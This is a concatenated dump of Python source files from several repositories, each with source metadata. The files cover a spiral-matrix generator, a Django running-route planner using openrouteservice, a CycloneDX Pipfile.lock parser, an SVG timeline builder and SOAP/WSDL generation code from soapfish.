def moverNorte(figure,x,y,pasos):
for i in range(pasos):
y = y
x = x - 1
figure[x][y] =1
return(x,y)
    x,y = moverEste(figure,x,y,size-1) # This one is outside the pattern, so we 'define' it as the default first move
d = "s"
    '''Snake traversal
    '''
for i in range(1,size,1):
if (d == "s"):
x,y = moverSur(figure,x,y,size-i)
d = "o"
continue
if (d == "o"):
x,y = moverOeste(figure,x,y,size-i+1)
d = "n"
continue
if (d == "n"):
x,y = moverNorte(figure,x,y,size-i)
d = "e"
continue
if (d == "e"):
x,y = moverEste(figure,x,y,size-i+1)
d = "s"
continue
return(figure)
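# Illustrative usage sketch: print the snake/spiral pattern that makeFigure
# produces for a 5x5 figure (one row of the matrix per line).
if __name__ == '__main__':
    for row in makeFigure(5):
        print(row)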
``` |
{
"source": "jocarino/Runnify",
"score": 3
} |
#### File: Runnify/pages/openstreetmaps.py
```python
from math import pi
#circular coords libraries
from functools import partial
import pyproj
from shapely.ops import transform
from shapely.geometry import Point
#open route service libraries
import openrouteservice
from openrouteservice import convert
#map plotting
#import numpy as np
import math
#import pandas as pd
import matplotlib.pyplot as plt
#enables python to get the current location
import geocoder
# %%
#################################
###########FRONT END#############
#################################
'''
class FrontEndRequest(object):
def __init__(self, lat, lng, original_run):
self.lat = lat
self.lng = lng
self.original_run = original_run
#getting current location
g = geocoder.ip('me')
lat = g.lat
lng = g.lng
#Requested running distance
original_run = 20
#creat request object
front_end_request = FrontEndRequest(lat, lng, original_run)
'''
#%%
#################################
########### TESTING #############
#################################
# #Plots circular generated coordinates in a map image
# plot_option = False
# #Prints out delta for optimization (finding the accurate total distance)
# print_delta = True
# #Prints in case the API fucksup
# api_check = False
#%%
#################################
###########FUNCTIONS#############
#################################
# generates list with coordinate pairs in tuples, from the center
def geodesic_point_buffer(front_end_request, radius, angle = pi/2):
"""
Parameters
----------
    front_end_request : FrontEndRequest
        Object carrying the centre latitude (lat) and longitude (lng).
    radius : float
        Radius of the route, in km.
    angle : float
        Angle in radians by which the circle centre is offset from the start point.
Returns
-------
TYPE
list of the coords as tuples [(lat, lng), ..., (lat, lng)]
"""
#correcting for the lng and lat side orientation
angle += pi/2
#Performs cartographic transformations. Converts from longitude, latitude to native map projection x,y coordinates and vice versa using PROJ
proj_wgs84 = pyproj.Proj('+proj=longlat +datum=WGS84')
#radius is in km
# Azimuthal equidistant projection
aeqd_proj = '+proj=aeqd +lat_0={lat} +lon_0={lon} +x_0=0 +y_0=0'
project = partial(
pyproj.transform,
pyproj.Proj(aeqd_proj.format(lat=front_end_request.lat, lon=front_end_request.lng)),
proj_wgs84)
    # in Point(lat, lng), increasing the lat value shifts the buffer further in latitude; the same holds for lng
    # multiplying the lat or lng inside Point() by 1000*radius moves the point to one of the edges
#buf = Point(radius* math.cos(angle), radius * math.sin(angle)).buffer(radius * 1000) # distance in metres
buf = Point(radius * 1000 * math.cos(angle), radius * 1000 * math.sin(angle)).buffer(radius * 1000) # distance in metres
return transform(project, buf).exterior.coords[:]
#just to separate lat and long
def plotting_coords_in_map(front_end_request, map_file, coords):
"""
Parameters
----------
map_file : string
It's the file path to the map image.
c : list
list of the coords as tuples [(lat, lng), ..., (lat, lng)].
Returns
-------
None. Just plots
"""
lat_list = []
lng_list = []
for c in coords:
lat_list.append(c[0])
lng_list.append(c[1])
    #define bounding box of the map
bounding_box = (min(lng_list), max(lng_list), min(lat_list), max(lat_list))
#load map image
map_image = plt.imread(map_file)
fig, ax = plt.subplots(figsize = (8,7))
ax.scatter(lng_list, lat_list, zorder=1, alpha=0.7, c='r', s=50)
    ax.scatter(front_end_request.lng, front_end_request.lat, zorder=2, alpha=0.7, c='b', s=500)
ax.set_title('Plotting the route')
ax.set_xlim(bounding_box[0], bounding_box[1],bounding_box[2], bounding_box[3])
ax.imshow(map_image, zorder=0, extent=bounding_box, aspect='auto')
class Route(object):
def __init__(self, route_json):
self.route = route_json
self.distance = route_json['routes'][0]['summary']['distance']
def getting_route(front_end_request, run, angle = pi/2, plot_option = False):
"""
Parameters
----------
front_end_request : FrontEndRequest
Object with the info requested from the front end.
run : float
Running distance requested by the user.
Returns
-------
Route
a route object
"""
radius = run/(2*pi)
#2pi*r = P <=> r = P/2*pi
#generate the coords
#coords = geodesic_point_buffer(lat, lon, radius)
coords = geodesic_point_buffer(front_end_request, radius, angle)
#turn coords in list in order to reduce to half
#coords = []
# for c in b:
# c1 = c[0]
# c2 = c[1]
# cf = (c1, c2)
# coords.append(cf)
#reduce to half, api only accepts 50 data points
while len(coords) > 50:
coords = coords[::2]
#for testing
if plot_option:
plotting_coords_in_map(front_end_request, 'map.png', coords)
print("map ploted")
#python openstreetmaps.py
#API key
client = openrouteservice.Client(key='<KEY>')
#coords = ((8.34234,48.23424),(8.34423,48.26424), (8.34523,48.24424), (8.41423,48.21424))
#api needs coords in tupple
coords_b = tuple(coords)
#get the full route
route_json = client.directions(coords_b, profile='cycling-regular', optimize_waypoints=False)
route = Route(route_json)
return route
def relative_error(total_distance, original_run):
"""
Parameters
----------
total_distance : float
distance of the route generated by the API
original_run : float
target distance given by the user
Returns
-------
float
relative error to the target distance
"""
return (total_distance - original_run*1000)/(original_run*1000)
def closer_to_target(prev_option, route, original_run):
"""
Parameters
----------
prev_option : tuple (routes json, distance float)
previous distance.
routes : json object
routes json related to the current closest option.
distance : float
current calculated distance.
original_run : float
current target distance for the run.
Returns
-------
(routes, distance) : tuple (routes json, distance float)
closest tuple to the distance run
"""
prev_distance = prev_option.distance
prev_distance_error = abs(original_run - prev_distance)
distance_error = abs(original_run - route.distance)
#check the lowest error to the target
if prev_distance_error < distance_error:
return prev_option
return route
#%%
#################################
###### MAIN ###########
#################################
def main_as_function(front_end_request, print_delta = False, plot_option = False, api_check = False):
"""
Parameters
----------
    front_end_request : FrontEndRequest
        object carrying the current latitude/longitude and the target
        running distance requested from the front end.
    print_delta : bool, optional
        prints optimization progress for testing. The default is False.
    plot_option : bool, optional
        plots the generated coordinates. The default is False.
api_check : bool, optional
prints in case the api does not work. The default is False.
Returns
-------
decoded_options : json object
decoded coordinates, separated by angles {angle: coordinates}.
"""
#tuning the distance due to mapping
run = front_end_request.original_run/3
#angles = [0, pi/2, pi, 3/4*pi]
angles = [0]
angles_degrees = ['0', '90', '180', '270']
#storing the different possibilities in tuples (routes and distance)
routing_options = []
#storing the decoded coords for each option
decoded_options = {}
for (n, angle) in enumerate(angles):
#100m of error on the total route
precision = 100
learning_rate = 1
route = getting_route(front_end_request, run, angle, plot_option)
lowest_option = route
delta = relative_error(route.distance, front_end_request.original_run)
#limit api requests
count = 0
#optimization
while count < 5:
#check target compliance
if abs(route.distance - front_end_request.original_run*1000) < precision:
routing_options.append(lowest_option)
break
else:
#store last value of run
run_prev = run
delta_prev = delta
#relative error for optimization reference
delta = relative_error(route.distance, front_end_request.original_run)
run = run_prev - learning_rate*delta
#in case delta changes to negative or vice-versa
if (delta*delta_prev > 0 and delta < 0) or (delta*delta_prev < 0 and delta > 0):
learning_rate = .2
#in case the API fucks up somehow
try:
#get a new distance value
route = getting_route(front_end_request, run)
except:
#for testing
if api_check:
print("API fuckup")
routing_options.append(lowest_option)
break
#store the info closest to target distance
lowest_option = closer_to_target(lowest_option, route, front_end_request.original_run)
#for testing
if print_delta:
print('Delta = ', delta,', learning Rate = ', learning_rate)
if route.distance < (front_end_request.original_run*1000 - precision):
print('Lower', route.distance)
elif route.distance > (front_end_request.original_run*1000 + precision):
print('Greater', route.distance)
            #up the counter
count += 1
#for testing
if print_delta:
print('Done', lowest_option.distance)
# get the geometry from the routes and decode_polyline needs the geometry only
geometry = lowest_option.route['routes'][0]['geometry']
decoded = convert.decode_polyline(geometry)
#prepare the json object with the angles and the coordinates
decoded_options[angles_degrees[n]] = decoded["coordinates"]
return decoded_options
#decoded_options = main_as_function(front_end_request, print_delta=True)
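# Minimal sanity-check sketch for relative_error, the error metric driving
# the optimization loop above (values here are made up, not from a real API
# call): a 10.5 km route against a 10 km target is 5% over.
if __name__ == '__main__':
    assert abs(relative_error(10500.0, 10) - 0.05) < 1e-9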
""" routes = client.directions(coords, profile='cycling-regular', optimize_waypoints=True)
openrouteservice.directions.directions(client, coordinates, profile='driving-car', format_out=None, format='json', preference=None, units=None, language=None, geometry=None, geometry_simplify=None, instructions=None, instructions_format=None, alternative_routes=None, roundabout_exits=None, attributes=None, maneuvers=None, radiuses=None, bearings=None, skip_segments=None, continue_straight=None, elevation=None, extra_info=None, suppress_warnings=None, optimized=None, optimize_waypoints=None, options=None, validate=True, dry_run=None)
profile (string) – Specifies the mode of transport to use when calculating directions. One of [“driving-car”, “driving-hgv”, “foot-walking”, “foot-hiking”, “cycling-regular”, “cycling-road”,”cycling-mountain”, “cycling-electric”,]. Default “driving-car”.
elevation (boolean) – Specifies whether to return elevation values for points. Default False.
extra_info (list or tuple of strings) – Returns additional information on [“steepness”, “suitability”, “surface”, “waycategory”, “waytype”, “tollways”, “traildifficulty”, “roadaccessrestrictions”]. Must be a list of strings. Default None.
"""
```
#### File: Runnify/pages/views.py
```python
from django.views.generic import TemplateView
from django.views.generic.edit import CreateView
from django.contrib.auth.forms import UserCreationForm
from django.shortcuts import render, redirect
import json
from .models import Coordinates, RouteRequest
from .openstreetmaps import main_as_function
#from django.contrib.gis.utils import GeoIP
#from django.contrib.gis.geoip2 import GeoIP2
import geocoder
from django.forms import modelform_factory
from .forms import RouteRequestForm
from django.conf import settings
from django.utils.http import is_safe_url
from django.http import HttpResponse, Http404, JsonResponse
ALLOWED_HOSTS = settings.ALLOWED_HOSTS
Coordinates = Coordinates()
def SaveCoordinatesToDB(list_of_coordinates):
Coordinates.coordinates = json.dumps(list_of_coordinates)
Coordinates.save()
#object used to generate the route
class routeRequestClass(object):
def __init__(self, coords, original_run):
self.lat = coords[0]
self.lng = coords[1]
self.original_run = original_run
def HomePageView(request):
form = RouteRequestForm()
return render(
request,
'pages/home.html',
context={},
status=200,
)
def get_route(request):
form = RouteRequestForm(request.POST or None)
next_url = request.POST.get("route") or None
if form.is_valid():
obj = form.save(commit=False)
#get the info from the frontend
running_distance = form.cleaned_data['running_distance']
user_location_info = form.cleaned_data['user_location']
obj.user_location = user_location_info
#generate the route
user_location = user_location_info.split(',')
route_request = routeRequestClass(user_location, running_distance)
route_json = main_as_function(route_request,print_delta=True)
list_of_coordinates = route_json['0']
# Save form object
#obj.save()
route = RouteRequest(running_distance= running_distance,
user_location= str(user_location_info))
if request.is_ajax():
return JsonResponse({"coordinates": list_of_coordinates}, status=201) # 201 == created items
if next_url != None and is_safe_url(next_url, ALLOWED_HOSTS):
return redirect(next_url)
return render(
request,
'pages/home.html',
context={'form':form,
'coordinates':list_of_coordinates}
)
class AboutPageView(TemplateView):
template_name = 'pages/about.html'
'''
def validate_username(request):
username = request.GET.get('username', None)
data = {
'is_taken': User.objects.filter(username__iexact=username).exists()
}
return JsonResponse(data)
class SignUpView(CreateView):
template_name = 'core/signup.html'
form_class = UserCreationForm
'''
``` |
{
"source": "jocassid/cyclonedx-python",
"score": 2
} |
#### File: cyclonedx_py/parser/pipenv.py
```python
import json
from typing import Any, Dict
from cyclonedx.model import ExternalReference, ExternalReferenceType, HashType
from cyclonedx.model.component import Component
from cyclonedx.parser import BaseParser
# See https://github.com/package-url/packageurl-python/issues/65
from packageurl import PackageURL # type: ignore
class PipEnvParser(BaseParser):
def __init__(self, pipenv_contents: str) -> None:
super().__init__()
pipfile_lock_contents = json.loads(pipenv_contents)
pipfile_default: Dict[str, Dict[str, Any]] = pipfile_lock_contents.get('default') or {}
for (package_name, package_data) in pipfile_default.items():
c = Component(
name=package_name,
version=str(package_data.get('version') or 'unknown').lstrip('='),
purl=PackageURL(
type='pypi', name=package_name, version=str(package_data.get('version') or 'unknown').lstrip('=')
)
)
if package_data.get('index') == 'pypi' and isinstance(package_data.get('hashes'), list):
# Add download location with hashes stored in Pipfile.lock
for pip_hash in package_data['hashes']:
ext_ref = ExternalReference(
reference_type=ExternalReferenceType.DISTRIBUTION,
url=c.get_pypi_url(),
comment='Distribution available from pypi.org'
)
ext_ref.add_hash(HashType.from_composite_str(pip_hash))
c.add_external_reference(ext_ref)
self._components.append(c)
class PipEnvFileParser(PipEnvParser):
def __init__(self, pipenv_lock_filename: str) -> None:
with open(pipenv_lock_filename) as r:
super(PipEnvFileParser, self).__init__(pipenv_contents=r.read())
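# Illustrative usage sketch: parse a Pipfile.lock and list the parsed
# components. It assumes a Pipfile.lock exists in the working directory and
# that the BaseParser base class exposes the collected components through
# get_components().
if __name__ == '__main__':
    parser = PipEnvFileParser(pipenv_lock_filename='Pipfile.lock')
    for component in parser.get_components():
        print(component.name, component.version)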
``` |
{
"source": "jocassid/pysvgi",
"score": 3
} |
#### File: jocassid/pysvgi/CyclicTimeline.py
```python
from collections import namedtuple
from datetime import datetime, timedelta
from math import ceil
from dom import Document
from pysvgi import Circle, Line, Svg, Text
class DatetimeUtil:
"""Adds some additional methods to the standard datetime class"""
# tuple as generated by datetime.timetuple:
#
# time.struct_time(
# tm_year=2017,
# tm_mon=9,
# tm_mday=17,
# tm_hour=0,
# tm_min=37,
# tm_sec=30,
# tm_wday=6,
# tm_yday=260,
# tm_isdst=-1)
ResolutionData = namedtuple(
'ResolutionData',
['mask', 'timedelta_args'])
RESOLUTIONS = {
'hour': ResolutionData(
(1, 1, 1, 1, 0, 0, 0),
{'seconds': 60 * 60})
}
@staticmethod
def round_down(datetime_in, resolution):
if resolution not in DatetimeUtil.RESOLUTIONS:
raise ValueError("Invalid resolution %s" % resolution)
mask = DatetimeUtil.RESOLUTIONS[resolution].mask
dateTuple = datetime_in.timetuple()[:7]
args = [a * b for a, b in zip(dateTuple, mask)]
return datetime(*args)
@staticmethod
def round_up(datetime_in, resolution):
rounded_datetime = DatetimeUtil.round_down(datetime_in, resolution)
timedelta_args = DatetimeUtil.RESOLUTIONS[resolution].timedelta_args
return rounded_datetime + timedelta(**timedelta_args)
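# Quick illustrative check of the mask-based rounding above, using the 'hour'
# resolution defined in RESOLUTIONS: 09:37:30 rounds down to 09:00 and up to 10:00.
if __name__ == '__main__':
    assert DatetimeUtil.round_down(datetime(2017, 9, 17, 9, 37, 30), 'hour') == datetime(2017, 9, 17, 9)
    assert DatetimeUtil.round_up(datetime(2017, 9, 17, 9, 37, 30), 'hour') == datetime(2017, 9, 17, 10)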
class Event:
DATE_FORMAT = '%Y-%m-%d %H:%M:%S'
def __init__(self, startTime):
self.startTime = startTime
self.x = None
self.y = None
def onRow(self, row):
return row.startTime <= self.startTime < row.nextRowStartTime
def __repr__(self):
return '<Event %s>' % self.startTime.strftime(self.DATE_FORMAT)
def __eq__(self, rhs):
if rhs is None:
return False
if type(rhs) != type(self):
return False
return self.startTime == rhs.startTime
def layout(self, row):
self.x = row.datetimeToX(self.startTime)
self.y = row.baseY
def render(self):
print('rendering event')
return [Circle(5, self.x, self.y)]
class EventSpan(Event):
def __init__(self, startTime, endTime):
super().__init__(startTime)
self.endTime = endTime
def split(self, splitTime, resolutionTimedelta):
if not (self.startTime < splitTime < self.endTime):
return self, None
remainderEvent = EventSpan(splitTime, self.endTime)
self.endTime = splitTime - resolutionTimedelta
return self, remainderEvent
def __repr__(self):
return '<EventSpan %s - %s>' % \
(self.startTime.strftime(self.DATE_FORMAT),
self.endTime.strftime(self.DATE_FORMAT))
class EventSeries(list):
def __init__(self, name, color, iterable=None):
if iterable is None:
super().__init__()
else:
super().__init__(iterable)
self.name = name
self.color = color
def append(self, event):
event.color = self.color
super().append(event)
def sort(self):
super().sort(key=lambda i: i.startTime)
def getEventsOnRow(self, row, resolutionTimedelta):
eventsOut = []
remnants = []
for event in self:
if not event.onRow(row):
continue
# if isinstance(event, EventSpan):
# event, remnant = event.split(
# row.nextRowStartTime,
# resolutionTimedelta)
# remnants.append(remnant)
eventsOut.append(event)
for remnant in remnants:
self.insert(0, remnant)
return eventsOut
class Row:
def __init__(
self,
startTime,
nextRowStartTime,
minX,
maxX,
baseY):
self.startTime = startTime
self.nextRowStartTime = nextRowStartTime
self.minX = minX
self.maxX = maxX
self.baseY = baseY
self.recalculate()
def recalculate(self):
self.width = self.maxX - self.minX
self.startTimestamp = self.startTime.timestamp()
self.timeSpan = self.nextRowStartTime.timestamp() - self.startTimestamp
def datetimeToX(self, datetimeIn):
        timeSinceStart = datetimeIn.timestamp() - self.startTimestamp
temp = (timeSinceStart / self.timeSpan) * self.width
return self.minX + int(temp)
class CyclicTimeline(Svg):
MARGIN_TOP = 50
MARGIN_BOTTOM = 50
MARGIN_LEFT = 50
MARGIN_RIGHT = 50
SPACE_FOR_DATE = 100
LINE_LENGTH = 300
RESOLUTION_TIMEDELTA = timedelta(seconds=60)
CycleConfiguration = namedtuple(
'CycleConfiguration',
[
'timedeltaArgs',
'dateFormat'
])
CYCLE_LENGTHS = {
'hour': CycleConfiguration(
{'seconds': 3600},
'%H:%M'),
'day': CycleConfiguration(
{'days': 1},
'%Y-%m-%d'),
'week': CycleConfiguration(
{'days': 7},
'%Y-%m-%d'),
'month': None,
'year': CycleConfiguration(
{'days': 365.25},
'%Y')
}
ROW_HEIGHT = 30
def __init__(
self,
startDate,
endDate,
cycleLength='hour',
dateFormat=None):
super().__init__()
self.startDate = DatetimeUtil.round_down(startDate, cycleLength)
self.endDate = DatetimeUtil.round_up(endDate, cycleLength)
self.config = self.CYCLE_LENGTHS.get(cycleLength, None)
if self.config is None:
raise ValueError("Invalid cycleLength %s" % self.cycleLength)
self.cycleLength = cycleLength
if dateFormat is None:
self.dateFormat = self.config.dateFormat
else:
self.dateFormat = dateFormat
self.allEventSeries = []
self.rowStartTimes = {}
def getRowCount(self, span):
if self.cycleLength == 'hour':
return ceil(span.total_seconds() / 60.0 / 60.0)
raise ValueError('%s cycleLength not implemented' % self.cycleLength)
def getRowStartTime(self, rowIndex):
# Note: I'm using integer keys into a dict
if rowIndex in self.rowStartTimes:
return self.rowStartTimes[rowIndex]
timedeltaArgs = self.config.timedeltaArgs
timedeltaArgs = {
k: v * rowIndex for k, v in list(timedeltaArgs.items())
}
startTime = self.startDate + timedelta(**timedeltaArgs)
self.rowStartTimes[rowIndex] = startTime
twoBack = rowIndex - 2
if twoBack in self.rowStartTimes:
self.rowStartTimes.pop(twoBack)
return startTime
def sortEvents(self):
for eventSeries in self.allEventSeries:
eventSeries.sort()
def getEventsOnThisRow(self, row):
eventsOut = []
for eventSeries in self.allEventSeries:
eventsOut += eventSeries.getEventsOnRow(
row,
self.RESOLUTION_TIMEDELTA)
        eventsOut.sort(key=lambda event: event.startTime)
return eventsOut
def layoutEvents(self, rowEvents, row):
placedEvents = []
maxY = row.baseY
for i, event in enumerate(rowEvents):
event.layout(row)
return maxY
def renderCycleLine(self, y, rowStartTime, lineMinX, lineMaxX):
text = Text(
rowStartTime.strftime(self.dateFormat),
self.MARGIN_LEFT,
y,
text_anchor='start')
self.append(text)
line = Line(lineMinX, y, lineMaxX, y)
self.append(line)
def renderEvents(self):
for eventSeries in self.allEventSeries:
for event in eventSeries:
for element in event.render():
self.append(element)
def build(self):
span = self.endDate - self.startDate
print('timelineSpan', span)
rows = self.getRowCount(span)
self.sortEvents()
y = self.MARGIN_TOP
lineMinX = self.MARGIN_LEFT + self.SPACE_FOR_DATE
lineMaxX = self.MARGIN_LEFT + self.SPACE_FOR_DATE + self.LINE_LENGTH
for i in range(rows):
rowStartTime = self.getRowStartTime(i)
            nextRowStartTime = self.getRowStartTime(i + 1)
row = Row(
rowStartTime,
nextRowStartTime,
lineMinX,
lineMaxX,
y)
rowEvents = self.getEventsOnThisRow(row)
y = self.layoutEvents(
rowEvents,
row)
self.renderCycleLine(y, rowStartTime, lineMinX, lineMaxX)
self.renderEvents()
y += 20
self.height = y + self.MARGIN_BOTTOM
self.width = self.MARGIN_LEFT + self.SPACE_FOR_DATE + \
self.LINE_LENGTH + self.MARGIN_RIGHT
def toprettyxml(self, indent='\t', newl='\n', encoding=''):
self.build()
return super().toprettyxml(indent, newl, encoding)
def __str__(self):
return super().__str__()
if __name__ == '__main__':
timeline = CyclicTimeline(
datetime(2017, 9, 10, 9),
datetime(2017, 9, 10, 17),
'hour',
'%I:%M %p')
series1 = EventSeries('series1', 'green')
series1.append(Event(datetime(2017, 9, 10, 9, 30)))
series1.append(
EventSpan(
datetime(2017, 9, 10, 9, 40),
datetime(2017, 9, 10, 9, 50)))
timeline.allEventSeries = [series1]
with open('timeline.svg', 'w') as outFile:
outFile.write(Document.XML_LINE + '\n')
outFile.write(timeline.toprettyxml())
```
#### File: jocassid/pysvgi/test_pysvgi.py
```python
from unittest import TestCase
from pysvgi import Svg
class SvgTest(TestCase):
def test_init(self):
svg = Svg()
self.assertEqual("1.1", svg['version'])
self.assertEqual("full", svg['baseProfile'])
self.assertEqual("http://www.w3.org/2000/svg", svg['xmlns'])
def test_width(self):
svg = Svg()
svg.width = 200
self.assertEqual(200, svg.attributes['width'])
self.assertEqual(200, svg.width)
def test_height(self):
svg = Svg()
svg.height = 300
self.assertEqual(300, svg.attributes['height'])
self.assertEqual(300, svg.height)
```
#### File: jocassid/pysvgi/tryPysvgi.py
```python
from pysvgi import Svg, Rect, Circle, Text
def basic_svg_sample():
svg = Svg(300, 200)
rect = Rect('100%', '100%', fill="red")
circle = Circle(80, 150, 100, fill="green")
text = Text('SVG', x="150", y="125", font_size="60", text_anchor="middle",
fill="white")
svg.append(rect)
svg.append(circle)
svg.append(text)
print(svg.document())
def try_viewBox():
#svg = Svg(200, 200, viewBox="0 0 100 100")
svg = Svg(200, 200, viewBox="0 0 100 100")
svg.append(Circle(50, 50, 50, fill='red'))
svg.append(Circle(50, 50, 150, fill='blue'))
svg.append(Circle(50, 150, 50, fill='green'))
svg.append(Circle(50, 150, 150, fill='yellow'))
print('''<?xml version='1.0' encoding='utf-8'?>
<html>
<style>
body{ background: black }
svg{ border: solid white 1px }
</style>
<body>''')
print(svg)
print('''</body>
</html>''')
def main():
try_viewBox()
if __name__ == '__main__':
main()
``` |
{
"source": "jocassid/soapfish",
"score": 2
} |
#### File: soapfish/soapfish/py2wsdl.py
```python
from __future__ import absolute_import, print_function
import argparse
import imp
import logging
import sys
import six
from lxml import etree
from . import namespaces as ns, xsd
from .py2xsd import generate_xsdspec
from .soap import SOAP_HTTP_Transport
from .utils import uncapitalize
from .wsdl import get_wsdl_classes
logger = logging.getLogger('soapfish')
# --- Helpers -----------------------------------------------------------------
def build_service(wsdl, definitions, service):
wsdl_port = wsdl.Port()
wsdl_port.name = service.name + 'Port'
wsdl_port.binding = 'tns:' + service.name + 'Binding'
wsdl_port.address = wsdl.SOAP_Address(location=service.location)
wsdl_service = wsdl.Service()
wsdl_service.name = service.name
wsdl_service.ports.append(wsdl_port)
definitions.services.append(wsdl_service)
def build_bindings(wsdl, definitions, service):
binding = wsdl.Binding()
binding.name = service.name + 'Binding'
binding.type = 'tns:' + service.name + 'PortType'
binding.binding = wsdl.SOAP_Binding()
binding.binding.style = 'document'
binding.binding.transport = SOAP_HTTP_Transport
for method in service.methods:
operation = wsdl.Operation()
operation.name = method.operationName
operation.operation = wsdl.SOAP_Operation()
operation.operation.soapAction = method.soapAction
operation.input = wsdl.Input(body=wsdl.SOAP_Body(use='literal'))
operation.output = wsdl.Output(body=wsdl.SOAP_Body(use='literal'))
operation.operation.style = method.style
binding.operations.append(operation)
definitions.bindings.append(binding)
def build_portTypes(wsdl, definitions, service):
portType = wsdl.PortType()
portType.name = service.name + 'PortType'
for method in service.methods:
operation = wsdl.Operation()
operation.name = method.operationName
operation.input = wsdl.Input(message='tns:' + method.operationName + 'Input')
operation.output = wsdl.Output(message='tns:' + method.operationName + 'Output')
portType.operations.append(operation)
definitions.portTypes.append(portType)
def build_messages(wsdl, definitions, service):
for method in service.methods:
inputMessage = wsdl.Message(name=method.operationName + 'Input')
part = wsdl.Part(name='body')
if isinstance(method.input, six.string_types):
part.element = 'sns:' + method.input
else:
part.type = 'sns:' + uncapitalize(method.input.__name__)
inputMessage.parts = [part]
definitions.messages.append(inputMessage)
outputMessage = wsdl.Message(name=method.operationName + 'Output')
part = wsdl.Part(name='body')
if isinstance(method.output, six.string_types):
part.element = 'sns:' + method.output
else:
part.type = 'sns:' + uncapitalize(method.output.__name__)
outputMessage.parts = [part]
definitions.messages.append(outputMessage)
def build_types(wsdl, definitions, service):
schemas = [generate_xsdspec(schema) for schema in service.schemas]
definitions.types = wsdl.Types(schemas=schemas)
def generate_wsdl(service):
wsdl = get_wsdl_classes(service.version.BINDING_NAMESPACE)
definitions = wsdl.Definitions(targetNamespace=service.targetNamespace)
build_types(wsdl, definitions, service)
build_service(wsdl, definitions, service)
build_bindings(wsdl, definitions, service)
build_portTypes(wsdl, definitions, service)
build_messages(wsdl, definitions, service)
xmlelement = etree.Element(
'{%s}definitions' % ns.wsdl,
nsmap={
# FIXME: Look up properly if multiple schemas...
'sns': service.schemas[0].targetNamespace,
'soap': service.version.BINDING_NAMESPACE,
'tns': service.targetNamespace,
'wsdl': ns.wsdl,
'xsd': ns.xsd,
},
)
definitions.render(xmlelement,
definitions,
namespace=ns.wsdl,
elementFormDefault=xsd.ElementFormDefault.QUALIFIED)
return xmlelement
# --- Program -----------------------------------------------------------------
def main(argv=None):
stdout = getattr(sys.stdout, 'buffer', sys.stdout)
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description='Generates a WSDL document from a Python module.',
)
parser.add_argument('module', help='The path to a python module.')
parser.add_argument('output', help='Output path for WSDL document.',
nargs='?', type=argparse.FileType('wb'), default=stdout)
opt = parser.parse_args(sys.argv[1:] if argv is None else argv)
logger.info('Generating WSDL for Python module: %s' % opt.module)
module = imp.load_source('', opt.module)
tree = generate_wsdl(getattr(module, 'SERVICE'))
opt.output.write(etree.tostring(tree, pretty_print=True))
return 0
if __name__ == '__main__':
sys.exit(main())
```
#### File: soapfish/soapfish/soap.py
```python
from __future__ import absolute_import
import logging
import string
import requests
import six
from . import core, namespaces as ns, soap11, soap12, wsa
from .utils import uncapitalize
SOAP_HTTP_Transport = ns.wsdl_soap_http
logger = logging.getLogger('soapfish')
class SOAPVersion:
SOAP12 = soap12
SOAP11 = soap11
@classmethod
def get_version(cls, namespace):
if namespace == cls.SOAP11.ENVELOPE_NAMESPACE or namespace == cls.SOAP11.BINDING_NAMESPACE:
return cls.SOAP11
elif namespace == cls.SOAP12.ENVELOPE_NAMESPACE or namespace == cls.SOAP12.BINDING_NAMESPACE:
return cls.SOAP12
else:
raise ValueError("SOAP version with namespace '%s' is not supported." % namespace)
@classmethod
def get_version_name(cls, namespace):
version = cls.get_version(namespace)
return version.__name__
@classmethod
def get_version_from_xml(cls, xml):
namespaces = {'wsdl': ns.wsdl, 'soap12': ns.wsdl_soap12}
if xml.xpath('wsdl:binding/soap12:binding', namespaces=namespaces):
return cls.SOAP12
else:
return cls.SOAP11
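# Illustrative check of the namespace-to-version mapping above; because of the
# relative imports it only runs via `python -m soapfish.soap`.
if __name__ == '__main__':
    assert SOAPVersion.get_version(soap11.ENVELOPE_NAMESPACE) is SOAPVersion.SOAP11
    assert SOAPVersion.get_version(soap12.BINDING_NAMESPACE) is SOAPVersion.SOAP12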
class Service(object):
'''
Describes service aggregating information required for dispatching and
WSDL generation.
'''
def __init__(self, targetNamespace, location, schemas, methods,
version=SOAPVersion.SOAP11, name='Service',
input_header=None, output_header=None, use_wsa=False):
'''
:param targetNamespace: string
:param location: string, endpoint url.
:param schemas: xsd.Schema instances.
:param methods: list of xsd.Methods
'''
self.name = name
self.targetNamespace = targetNamespace
self.location = location
self.schemas = schemas
self.methods = methods
self.version = version
self.use_wsa = use_wsa
if use_wsa and input_header is None:
input_header = wsa.WSAsaHeader
if use_wsa and output_header is None:
output_header = wsa.WSAHeader
self.input_header = input_header
self.output_header = output_header
def get_method(self, operationName):
return next(m for m in self.methods if m.operationName == operationName)
def find_element_by_name(self, name):
element = None
for schema in self.schemas:
element = schema.get_element_by_name(name)
if element is not None:
break
return element
def route(self, operationName):
"""Decorator to bind a Python function to service method."""
method = self.get_method(operationName)
def wrapper(func):
method.function = func
return func
return wrapper
class Stub(object):
'''
Client stub. Handles only document style calls.
'''
SERVICE = None
SCHEME = 'http'
HOST = 'www.example.net'
    def __init__(self, username=None, password=None, service=None, location=None):
self.username = username
self.password = password
self.service = service if service else self.SERVICE
context = {'scheme': self.SCHEME, 'host': self.HOST}
if location is None:
location = lambda template, context: string.Template(template).safe_substitute(**context)
if callable(location):
self.location = location(self.service.location, context)
elif isinstance(location, six.string_types):
self.location = location
else:
raise TypeError('Expected string or callable for location.')
def _handle_response(self, method, http_headers, content):
soap = self.service.version
envelope = soap.Envelope.parsexml(content)
if envelope.Header and method and method.output_header:
response_header = envelope.Header.parse_as(method.output_header)
else:
response_header = None
if envelope.Body.Fault:
code, message, actor = soap.parse_fault_message(envelope.Body.Fault)
error = core.SOAPError(code=code, message=message, actor=actor)
raise error
if isinstance(method.output, six.string_types):
_type = self.service.find_element_by_name(method.output)._type.__class__
else:
_type = method.output
body = envelope.Body.parse_as(_type)
return core.SOAPResponse(body, soap_header=response_header)
def call(self, operationName, parameter, header=None):
'''
:raises: lxml.etree.XMLSyntaxError -- validation problems.
'''
soap = self.service.version
method = self.service.get_method(operationName)
if isinstance(method.input, six.string_types):
tagname = method.input
else:
tagname = uncapitalize(parameter.__class__.__name__)
auth = (self.username, self.password) if self.username else None
data = soap.Envelope.response(tagname, parameter, header=header)
headers = soap.build_http_request_headers(method.soapAction)
logger.info("Call '%s' on '%s'", operationName, self.location)
logger.debug('Request Headers: %s', headers)
logger.debug('Request Envelope: %s', data)
r = requests.post(self.location, auth=auth, headers=headers, data=data)
logger.debug('Response Headers: %s', r.headers)
